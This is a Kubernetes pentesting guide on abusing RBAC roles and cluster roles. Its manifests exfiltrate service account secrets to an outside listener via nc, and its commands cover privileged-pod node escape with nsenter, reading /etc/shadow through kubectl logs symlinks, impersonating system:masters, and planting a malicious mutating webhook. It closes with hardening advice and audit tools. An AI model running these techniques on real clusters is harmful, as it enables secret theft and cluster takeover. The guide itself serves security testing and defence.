
Abusing Roles/ClusterRoles in Kubernetes

Here you can find some potentially dangerous Role and ClusterRole configurations.

Remember that you can list all the supported resources with `kubectl api-resources`.

Privilege Escalation

Privilege escalation is the art of gaining access to a different principal within the cluster, with different privileges (within the Kubernetes cluster or in external clouds) than the ones you already have. In Kubernetes there are basically 4 main techniques to escalate privileges:

- Be able to impersonate other users/groups/SAs with better privileges within the Kubernetes cluster or in external clouds

- Be able to create/patch/exec pods where you can find or attach SAs with better privileges within the Kubernetes cluster or in external clouds

- Be able to read secrets, as SA tokens are stored as secrets

- Be able to escape from a container to the node, where you can steal the secrets of all the containers running on the node, the node's credentials, and the node's permissions within the cloud it's running in (if any)

- A fifth technique that deserves a mention is the ability to run port-forward in a pod, as you may be able to access interesting resources within that pod.

Access Any Resource or Verb

This privilege provides access to any resource with any verb. It is the most powerful privilege a user can get, especially if it is granted through a ClusterRole: in that case the user can access the resources of any namespace and own the cluster with that permission.

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: api-resource-verbs-all
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
```

Access Any Resource

Giving a user permission to access any resource can be very risky. But which verbs allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:

- `resources: ["*"]` `verbs: ["create"]`: this privilege can create any resource in the cluster, such as pods, roles, etc. An attacker might abuse it to escalate privileges. An example of this can be found in the “Pod Create - Steal Token” section.

- `resources: ["*"]` `verbs: ["list"]`: the ability to list any resource can be used to leak other users’ secrets and might make it easier to escalate privileges. An example of this is located in the “Listing Secrets” section.

- `resources: ["*"]` `verbs: ["get"]`: this privilege can be used to get secrets from other service accounts.

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: api-resource-verbs-all
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["create", "list", "get"]
```



Pod Create - Steal Token

An attacker with permission to create a pod in the “kube-system” namespace can, for example, run cryptomining containers. Moreover, if a service account with privileged permissions exists in that namespace, the attacker can run a pod with that service account and abuse its permissions to escalate privileges.
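For reference, here is a minimal sketch of the RBAC rule this technique relies on. It assumes a namespaced Role in kube-system, and the name `pod-creator` is hypothetical. As far as RBAC is concerned, no extra permission is needed to set `serviceAccountName` to another service account of the same namespace, although admission policies may still restrict it.

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-creator        # hypothetical name
  namespace: kube-system
rules:
- apiGroups: [""]          # "" is the core API group, where pods live
  resources: ["pods"]
  verbs: ["create"]        # enough to start a pod that uses any SA of this namespace
```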



Here we have a default privileged account named bootstrap-signer with permissions to list all secrets.



The attacker can create a malicious pod that uses the privileged service account. Then, abusing the service account token, it will exfiltrate the secrets:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  hostNetwork: true
```

In the previous YAML, note how the bootstrap-signer service account is set in `serviceAccountName`.

So just create the malicious pod and wait for the secrets to arrive on the listener at port 6666 (192.168.154.228:6666 in the example).

Pod Create & Escape

The following definition gives all the privileges a container can have:

- Privileged access (disabling protections and setting capabilities)

- Disabled IPC and PID namespace isolation (`hostIPC` and `hostPID`), which can help to escalate privileges

- Disabled network namespace isolation (`hostNetwork`), giving access to steal the node's cloud privileges and better access to networks

- The host's `/` mounted inside the container

{% code title="super_privs.yaml" %}

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  # Uncomment and specify a specific node you want to debug
  # nodeName: <insert-node-name-here>
  containers:
  - image: ubuntu
    command:
      - "sleep"
      - "3600" # adjust this as needed -- use only as long as you need
    imagePullPolicy: IfNotPresent
    name: ubuntu
    securityContext:
      allowPrivilegeEscalation: true
      privileged: true
      #capabilities:
      #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
      runAsUser: 0 # run as root (or any other user)
    volumeMounts:
    - mountPath: /host
      name: host-volume
  restartPolicy: Never # we want to be intentional about running this pod
  hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
  hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
  hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.html
  volumes:
  - name: host-volume
    hostPath:
      path: /
```

{% endcode %}

Create the pod with:

```bash
kubectl --token $token create -f super_privs.yaml
```

One-liner from this tweet and with some additions:

```bash
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
```

Now that you can escape to the node, check the post-exploitation techniques in:

{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} attacking-kubernetes-from-inside-a-pod.md {% endcontent-ref %}

Stealth

You probably want to be stealthier. In the following pages you can see what you would be able to access if you create a pod enabling only some of the privileges mentioned in the previous template:

You can find examples of how to create/abuse the previous privileged pod configurations in https://github.com/BishopFox/badPods

Pod Create - Move to cloud

If you can create a pod (and optionally a service account), you might be able to obtain privileges in the cloud environment by assigning cloud roles to a pod or a service account and then accessing it.

Moreover, if you can create a pod with the host network namespace you can steal the IAM role of the node instance.

For more information check:

{% content-ref url="../kubernetes-access-to-other-clouds.md" %} kubernetes-access-to-other-clouds.md {% endcontent-ref %}



Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs

Deployments, DaemonSets, StatefulSets, ReplicationControllers, ReplicaSets, Jobs and CronJobs are all resources that create workloads in the cluster, and all of them end up creating pods. So it's possible to abuse them to escalate privileges just like in the previous example.

Suppose we have the permission to create a Daemonset and we create the following YAML file. This YAML file is configured to do the same steps we mentioned in the “create pods” section.

```yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: alpine
  namespace: kube-system
spec:
  selector:
    matchLabels:
      name: alpine
  template:
    metadata:
      labels:
        name: alpine
    spec:
      serviceAccountName: bootstrap-signer
      automountServiceAccountToken: true
      hostNetwork: true
      containers:
      - name: alpine
        image: alpine
        command: ["/bin/sh"]
        args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
```

The `spec` object and its child `template` hold the configuration for the task we wish to accomplish. Also notice the `serviceAccountName` field and the `containers` object inside the template: this is the part that creates our malicious container.

The Kubernetes API documentation shows that all these workload types embed a `PodTemplateSpec`, which defines the pods (and therefore the containers) they create. For most of them it is the `template` field; for CronJobs it is `jobTemplate.spec.template`. So deployments, daemonsets, statefulsets, replicationcontrollers, replicasets, jobs and cronjobs can all be used to create pods.

So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.
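As a reference, here is a minimal sketch of a Role granting the workload permissions discussed above. It assumes a namespaced Role in kube-system, and the name `workload-creator` is hypothetical. Note that these resources live in three different API groups:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: workload-creator   # hypothetical name
  namespace: kube-system
rules:
- apiGroups: ["apps"]
  resources: ["deployments", "daemonsets", "statefulsets", "replicasets"]
  verbs: ["create", "patch"]
- apiGroups: [""]          # ReplicationControllers are in the core group
  resources: ["replicationcontrollers"]
  verbs: ["create", "patch"]
- apiGroups: ["batch"]
  resources: ["jobs", "cronjobs"]
  verbs: ["create", "patch"]
```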

Pods Exec

Pod exec is a Kubernetes feature (the `pods/exec` subresource) used to run commands, such as a shell, inside a pod's container. This privilege is meant for administrators who want to access containers and run commands; it's similar to opening an SSH session into the container.

If we have this privilege, we can effectively take control of every pod we are allowed to exec into. To do that, we need to use the following command:

```bash
kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
```

Note that since you can get inside any pod, you can abuse other pods' service account tokens, just like in the Pod Create exploitation, to try to escalate privileges.
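Here is a minimal sketch of the RBAC rules behind `kubectl exec`. It assumes a namespaced Role, and the name `pod-exec` and the `default` namespace are hypothetical. The exec request itself is authorized as the `create` verb on the `pods/exec` subresource, while `get` on `pods` lets kubectl look up the target pod:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-exec           # hypothetical name
  namespace: default       # hypothetical namespace
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get"]           # lets kubectl resolve the target pod
- apiGroups: [""]
  resources: ["pods/exec"]
  verbs: ["create"]        # authorizes the exec request itself
```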

port-forward

This permission allows forwarding a local port to a port in the specified pod. It is meant to make debugging applications running inside a pod easy, but an attacker might abuse it to access interesting (like DBs) or vulnerable applications (webs?) inside a pod:

```bash
kubectl port-forward pod/mypod 5000:5000
```
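Similarly, here is a minimal sketch of the rule that allows port forwarding. It assumes a namespaced Role, and the names are hypothetical. Port forwarding is authorized as `create` on the `pods/portforward` subresource:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-port-forward   # hypothetical name
  namespace: default       # hypothetical namespace
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get"]
- apiGroups: [""]
  resources: ["pods/portforward"]
  verbs: ["create"]        # authorizes kubectl port-forward
```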

Hosts Writable /var/log/ Escape

As indicated in this research, if you can access or create a pod with the host's /var/log/ directory mounted on it, you can escape from the container.

This is basically because when the Kube-API tries to get the logs of a container (using `kubectl logs <pod>`), the Kubelet reads the pod's `0.log` file from the host's `/var/log/pods/` directory and returns its content.

Moreover, the Kubelet service exposes a `/logs/` endpoint that basically serves the node's `/var/log` filesystem.

Therefore, an attacker with write access to the host's /var/log/ folder from inside the container could abuse this behavior in 2 ways:

- Modifying the `0.log` file of its container (usually located in `/var/log/pods/namespace_pod_uid/container/0.log`) to be a symlink pointing to `/etc/shadow`, for example. Then you will be able to exfiltrate the host's shadow file doing:

```bash
kubectl logs escaper
failed to get parse function: unsupported log format: "root::::::::\n"
kubectl logs escaper --tail=2
failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\n"
# Keep incrementing tail to exfiltrate the whole file
```

- If the attacker controls any principal with permission to read `nodes/log`, they can just create a symlink in `/host-mounted/var/log/sym` pointing to `/`, and when accessing `https://<gateway>:10250/logs/sym/` they will list the host's root filesystem (changing the symlink can provide access to files).

```bash
curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/'
<a href="bin">bin</a>
<a href="data/">data/</a>
<a href="dev/">dev/</a>
<a href="etc/">etc/</a>
<a href="home/">home/</a>
<a href="init">init</a>
<a href="lib">lib</a>
[...]
```

A laboratory and automated exploit can be found in https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts
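For the second technique, here is a minimal sketch of a ClusterRole granting read access to the Kubelet `/logs/` endpoint. It assumes the Kubelet uses webhook authorization against the API server, and the name `node-log-reader` is hypothetical. Kubelet requests under `/logs/` are checked as the `nodes/log` subresource, and an HTTP GET maps to the `get` verb:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: node-log-reader    # hypothetical name
rules:
- apiGroups: [""]
  resources: ["nodes/log"] # covers https://<node>:10250/logs/...
  verbs: ["get"]
```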

Bypassing readOnly protection

If you are lucky and the highly privileged capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw:

```bash
mount -o rw,remount /hostlogs/
```

Bypassing hostPath readOnly protection

As stated in this research it’s possible to bypass the protection:

```yaml
allowedHostPaths:
  - pathPrefix: "/foo"
    readOnly: true
```

This protection was meant to prevent escapes like the previous ones. It can be bypassed by mounting a host folder into the container with write access through a PersistentVolume and a PersistentVolumeClaim, instead of a hostPath mount:

```yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: task-pv-volume-vol
  labels:
    type: local
spec:
  storageClassName: manual
  capacity:
    storage: 10Gi
  accessModes:
    - ReadWriteOnce
  hostPath:
    path: "/var/log"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: task-pv-claim-vol
spec:
  storageClassName: manual
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 3Gi
---
apiVersion: v1
kind: Pod
metadata:
  name: task-pv-pod
spec:
  volumes:
    - name: task-pv-storage-vol
      persistentVolumeClaim:
        claimName: task-pv-claim-vol
  containers:
    - name: task-pv-container
      image: ubuntu:latest
      command: [ "sh", "-c", "sleep 1h" ]
      volumeMounts:
        - mountPath: "/hostlogs"
          name: task-pv-storage-vol
```



Impersonating privileged accounts

With a user impersonation privilege, an attacker could impersonate a privileged account.



In this example, the service account sa-imper has a binding to a ClusterRole with rules that allow it to impersonate groups and users.
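Here is a minimal sketch of a ClusterRole with impersonation rights similar to the one described for `sa-imper`. The exact rules of the original example are only shown in the images, so this is an assumption, and the name `impersonator` is hypothetical. Impersonation uses the special `impersonate` verb on the `users`, `groups` and `serviceaccounts` resources of the core API group:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: impersonator       # hypothetical name
rules:
- apiGroups: [""]
  resources: ["users", "groups", "serviceaccounts"]
  verbs: ["impersonate"]   # enables kubectl --as / --as-group and Impersonate-* headers
```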



It's possible to list all secrets by adding the `--as=null --as-group=system:masters` flags to kubectl.

It's also possible to perform the same action via the REST API:

```bash
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" \
  -H "Impersonate-Group: system:masters" \
  -H "Impersonate-User: null" \
  -H "Accept: application/json" \
  https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```







Listing Secrets

The listing secrets privilege is a strong capability to have in the cluster. A user with permission to list secrets can potentially view all the secrets in the cluster, including the admin keys. Service account token secrets hold a JWT, stored base64-encoded in the secret's data.

An attacker that gains access to _list secrets_ in the cluster can use the following curl command to get all secrets in the “kube-system” namespace:

```bash
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
```





Reading a secret – brute-forcing token IDs

An attacker that found a token with permission to read a secret can’t use this permission without knowing the full secret’s name. This permission is different from the listing secrets permission described above.
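To make the distinction concrete, here is a minimal sketch of a Role that grants only `get` on secrets (the name is hypothetical). Without `list` (or `watch`), every request must target a secret by its exact name:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: secret-getter      # hypothetical name
  namespace: kube-system
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get"]           # no "list"/"watch": the secret name must be known
```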

Although the attacker doesn’t know the secret’s name, there are default service accounts that can be enumerated.

On clusters that still auto-generate service account token secrets (this stopped by default in Kubernetes 1.24), each service account has an associated secret whose name is a static (non-changing) prefix followed by a random five-character suffix.





The random suffix is a 5-character string built from lowercase letters and digits, but it doesn’t use all of them.

Looking at the source code, the suffix is generated from only 27 characters, “bcdfghjklmnpqrstvwxz2456789”, and not 36 (a-z and 0-9).

This means that there are 27^5 = 14,348,907 possibilities for a token.

An attacker can run a brute-force attack to guess the token ID in a couple of hours. Succeeding in getting secrets from default sensitive service accounts will allow them to escalate privileges.
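Here is the arithmetic behind the reduced search space, compared with a full lowercase alphanumeric alphabet of 36 characters:

$$
27^5 = 14{,}348{,}907 \qquad 36^5 = 60{,}466{,}176 \qquad \frac{36^5}{27^5} = \left(\frac{4}{3}\right)^5 = \frac{1024}{243} \approx 4.21
$$

So the restricted alphabet shrinks the search space by roughly a factor of four.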

Built-in Privileged Escalation Prevention

Although some permissions are risky, Kubernetes does a good job of preventing other types of privilege escalation.

Kubernetes has a built-in mechanism for that:

“The RBAC API prevents users from escalating privileges by editing roles or role bindings. Because this is enforced at the API level, it applies even when the RBAC authorizer is not in use.

A user can only create/update a role if they already have all the permissions contained in the role, at the same scope as the role (cluster-wide for a ClusterRole, within the same namespace or cluster-wide for a Role)”

Let’s see an example for such prevention.







A service account named sa7 is in a RoleBinding edit-role-rolebinding. This RoleBinding object has a role named edit-role that has full permissions rules on roles. Theoretically, it means that the service account can edit any role in the default namespace.



There is also an existing role named list-pods. Anyone with this role can list all the pods on the default namespace. The user sa7 should have permissions to edit any roles, so let’s see what happens when it tries to add the “secrets” resource to the role’s resources.

After trying to do so, we will receive an error “forbidden: attempt to grant extra privileges” (Figure 31), because although our sa7 user has permissions to update roles for any resource, it can update the role only for resources that it has permissions over.
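Here is a minimal reconstruction of the setup described above. It assumes the `default` namespace, and the verb list is an assumption because the original rules are only shown in the images. The verbs are listed explicitly because the `escalate` verb on roles, or the `*` wildcard that includes it, would let sa7 bypass this check:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: edit-role
  namespace: default
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["roles"]
  # No "escalate" and no "*": otherwise the escalation check is bypassed
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: edit-role-rolebinding
  namespace: default
subjects:
- kind: ServiceAccount
  name: sa7
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: edit-role
```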

Get & Patch RoleBindings/ClusterRoleBindings

{% hint style="danger" %} Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. You cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't already have them (unless you hold the `bind` verb on the referenced role). {% endhint %}



The privilege to create Rolebindings allows a user to bind roles to a service account. This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account.

The following ClusterRole is using the special verb bind that allows a user to create a RoleBinding with admin ClusterRole (default high privileged role) and to add any user, including itself, to this admin ClusterRole.
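Here is a minimal sketch of such a ClusterRole, following the pattern in the Kubernetes RBAC documentation (the name `admin-binder` is hypothetical). The `bind` verb on the `admin` ClusterRole lets the subject create bindings to it without holding the admin permissions itself. This is the sanctioned exception to the escalation check:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: admin-binder       # hypothetical name
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["rolebindings"]
  verbs: ["create"]        # create the RoleBinding object
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["clusterroles"]
  verbs: ["bind"]          # allowed to reference this role in a binding
  resourceNames: ["admin"]
```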

Then it's possible to create malicious-RoleBinging.json, which binds the admin role to another compromised service account:

```json
{
  "apiVersion": "rbac.authorization.k8s.io/v1",
  "kind": "RoleBinding",
  "metadata": {
    "name": "malicious-rolebinding",
    "namespace": "default"
  },
  "roleRef": {
    "apiGroup": "rbac.authorization.k8s.io",
    "kind": "ClusterRole",
    "name": "admin"
  },
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "compromised-svc",
      "namespace": "default"
    }
  ]
}
```

The purpose of this JSON file is to bind the admin ClusterRole (`roleRef`) to the compromised service account (`subjects`).

Now, all we need to do is send our JSON as a POST request to the API using the following curl command:

```bash
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" \
  -H "Content-Type: application/json" \
  https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \
  -d @malicious-RoleBinging.json
```

After the admin role is bound to the “compromised-svc” service account, we can use the compromised service account token to list secrets. A RoleBinding only grants permissions inside its own namespace, so this works in the `default` namespace. The following curl command will do this:

```bash
curl -k -v -X GET -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" \
  -H "Accept: application/json" \
  https://<master_ip>:<port>/api/v1/namespaces/default/secrets
```

Other Attacks

Sidecar proxy app

By default there isn't any encryption or mutual (two-way) authentication in pod-to-pod communication.

Create a sidecar proxy app

Create your .yaml

```bash
kubectl run app --image=bash --command -oyaml --dry-run=client -- sh -c 'ping google.com' > <appName.yaml>
```

Edit your .yaml and add the uncommented lines:

```yaml
#apiVersion: v1
#kind: Pod
#metadata:
#  name: security-context-demo
#spec:
#  securityContext:
#    runAsUser: 1000
#    runAsGroup: 3000
#    fsGroup: 2000
#  volumes:
#  - name: sec-ctx-vol
#    emptyDir: {}
#  containers:
#  - name: sec-ctx-demo
#    image: busybox
    command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ]
    securityContext:
      capabilities:
        add: ["NET_ADMIN"]
#    volumeMounts:
#    - name: sec-ctx-vol
#      mountPath: /data/demo
#    securityContext:
#      allowPrivilegeEscalation: true
```

See the logs of the proxy:

```bash
kubectl logs app -c proxy
```

More info at: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/

Malicious Admission Controller



An admission controller is a piece of code that intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized.

If an attacker somehow manages to inject a Mutating Admission Controller, they will be able to modify already authenticated requests, potentially escalating privileges and, more commonly, persisting in the cluster.
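To illustrate how such a webhook is registered, here is a minimal sketch of a MutatingWebhookConfiguration. It asks the API server to send every pod CREATE request to an in-cluster service for mutation. All names, the service path and the CA bundle are hypothetical placeholders. Creating this object requires `create` on `mutatingwebhookconfigurations` in the `admissionregistration.k8s.io` API group:

```yaml
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: demo-mutating-webhook            # hypothetical name
webhooks:
- name: pods.demo-webhook.example.com    # hypothetical; must be a fully qualified name
  admissionReviewVersions: ["v1"]
  sideEffects: None
  clientConfig:
    service:
      namespace: webhook-demo            # hypothetical namespace
      name: webhook-server               # hypothetical Service name
      path: /mutate                      # hypothetical path
    caBundle: <base64-encoded CA certificate>   # placeholder
  rules:
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE"]               # intercept every new pod
    resources: ["pods"]
```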

Example from https://blog.rewanthtammana.com/creating-malicious-admission-controllers:

```bash
git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo
cd malicious-admission-controller-webhook-demo
./deploy.sh
```



```bash
kubectl get po -n webhook-demo -w
```

Wait until the webhook server is ready. Check the status:



```bash
kubectl get mutatingwebhookconfigurations
kubectl get deploy,svc -n webhook-demo
```

Once we have our malicious mutating webhook running, let's deploy a new pod.

```bash
kubectl run nginx --image nginx
kubectl get po -w
```

Wait again until you see the pod status change. You should now see an ErrImagePull error. Check the image name with either of these queries:

```bash
kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'
kubectl describe po nginx | grep "Image: "
```

As you can see in the output, we tried running the nginx image but the final executed image is rewanthtammana/malicious-image. What just happened?

Technicalities

Let's unpack what just happened. The ./deploy.sh script that you executed created a mutating webhook admission controller. The lines below, from that admission controller, are responsible for the results above.

```go
patches = append(patches, patchOperation{
	Op:    "replace",
	Path:  "/spec/containers/0/image",
	Value: "rewanthtammana/malicious-image",
})
```

The above snippet replaces the first container image in every pod with rewanthtammana/malicious-image.

Best Practices





Prevent service account token automounting on pods

When a pod is created, Kubernetes automatically mounts a service account token in it (by default, the token of the `default` service account in the same namespace). Not every pod needs the ability to use the API from within itself.

From version 1.6+ it is possible to prevent automounting of service account tokens on pods using automountServiceAccountToken: false. It can be used on service accounts or pods.

On a service account it should be added like this:\
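A minimal sketch of the service-account-level setting, with a hypothetical service account name:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: build-robot                     # hypothetical name
automountServiceAccountToken: false     # pods using this SA get no token by default
```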

It is also possible to use it on the pod:\
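A minimal sketch of the pod-level setting, with hypothetical names. If both the pod and its service account set this field, the pod's value takes precedence:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: my-pod                          # hypothetical name
spec:
  serviceAccountName: build-robot       # hypothetical service account
  automountServiceAccountToken: false   # overrides the service account's setting
  containers:
  - name: app
    image: nginx
```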

Grant specific users to RoleBindings/ClusterRoleBindings

When creating RoleBindings/ClusterRoleBindings, make sure that only the users who need the role are included in the binding. It is easy to leave users who are no longer relevant inside such bindings.

Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings

When using ClusterRoles and ClusterRoleBindings, the permissions apply to the whole cluster. A user in such a binding has permissions over all the namespaces, which is often unnecessary. Roles and RoleBindings are scoped to a specific namespace and provide another layer of security.
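As an illustration, here is a minimal sketch of a RoleBinding that reuses the built-in `view` ClusterRole but grants it inside one namespace only. The user `jane` and the namespace `dev` are hypothetical. A RoleBinding that references a ClusterRole grants its permissions only within the RoleBinding's own namespace:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: view-in-dev          # hypothetical name
  namespace: dev             # hypothetical namespace; permissions apply only here
subjects:
- kind: User
  name: jane                 # hypothetical user
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: view                 # built-in read-only ClusterRole
  apiGroup: rbac.authorization.k8s.io
```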

Use automated tools

{% embed url="https://github.com/cyberark/KubiScan" %}

{% embed url="https://github.com/aquasecurity/kube-hunter" %}

{% embed url="https://github.com/aquasecurity/kube-bench" %}

References

{% embed url="https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions" %}

{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1" %}